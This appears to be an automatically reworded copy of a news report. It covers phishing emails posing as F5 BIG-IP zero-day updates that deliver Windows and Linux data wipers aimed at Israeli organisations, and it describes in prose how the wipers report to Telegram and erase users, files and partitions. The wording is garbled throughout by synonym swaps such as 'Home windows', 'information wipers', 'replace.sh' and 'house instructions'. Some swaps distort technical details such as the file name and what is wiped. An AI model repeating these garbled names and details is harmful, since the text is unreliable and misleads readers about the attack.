Thursday, December 21, 2023
HomeCyber SecurityPretend F5 BIG-IP zero-day warning emails push information wipers

Pretend F5 BIG-IP zero-day warning emails push information wipers


The Israel Nationwide Cyber Directorate warns of phishing emails pretending to be F5 BIG-IP zero-day safety updates that deploy Home windows and Linux information wipers.

Israel’s Nationwide Cyber Directorate (INCD) acts because the CERT answerable for defending the nation from cyber threats and to warn organizations and residents about recognized assaults.

Since October, Israel has been closely focused by pro-Palestinian and Iranian hacktivists, who’ve been conducting information theft and data-wiping assaults on organizations within the nation.

In November, a new information wiper known as BiBi Wiper was found that focused each Linux and Home windows gadgets and is believed to have been created by pro-Hamas hacktivists.

Pretend F5 replace deploys wiper

Yesterday, INCD warned of a brand new phishing assault deploying information wipers via emails pretending to be a warning a few zero-day vulnerability in F5 BIG-IP gadgets.

A professional-Palestinian hacktivist group named Handala informed BleepingComputer that they have been answerable for the phishing assault, stating it was deployed on quite a few Israeli networks. BleepingComputer has not been capable of verify these claims independently.

The phishing e-mail warns that the F5 BIG-IP zero-day vulnerability is actively exploited in assaults, urging Israeli organizations to obtain and set up a safety replace earlier than their community is breached.

Phishing email pushing fake F5 BIG-IP update
Phishing e-mail pushing pretend F5 BIG-IP replace
Supply: INCD

For Home windows customers, the e-mail pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, the file is a shell script named replace.sh [VirusTotal].

When launched, each the Home windows and Linux variations try to impersonate an F5 safety replace by displaying the corporate’s brand on the display.

For instance, the Home windows wiper will show a small display branded with the F5 brand that pretends to be a safety replace installer.

Windows data wiper impersonating F5 security update
Home windows information wiper impersonating F5 safety replace
S​​​​​ource: BleepingComputer

When the Replace button is clicked, the wiper will ship a message containing the data above the system to a Telegram channel and try to wipe all the info from the pc.

Nevertheless, in BleepingComputer’s assessments, the wiper is a bit buggy, not deleting all the information on a pc.

The Linux wiper is a shell script that first downloads the packages essential to wipe the pc, that are xfsprogs, wipe, and parted.

Linux wiper's data wiping routine
Linux wiper’s information wiping routine
Supply: BleepingComputer

These packages are used first to take away all customers on the system after which use the ‘wipe’ command to delete the related house instructions.

The wiper will then try to delete all working system information and the partitions on the Linux system. When carried out, the Linux pc is rebooted to trigger the partition adjustments to enter impact.

Just like the Home windows wiper, the Linux model will talk with a Telegram channel to offer details about the system and standing updates.

Knowledge wipers have grow to be an enormous drawback for Israel, with hacktivists generally utilizing them in harmful assaults to disrupt Israel’s operations and economic system.

As at all times, the most effective protection is just to obtain information from e-mail if they arrive from a trusted and confirmed supply. Moreover, safety updates ought to solely be downloaded immediately from a {hardware} vendor, not third-party websites.



Supply hyperlink

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments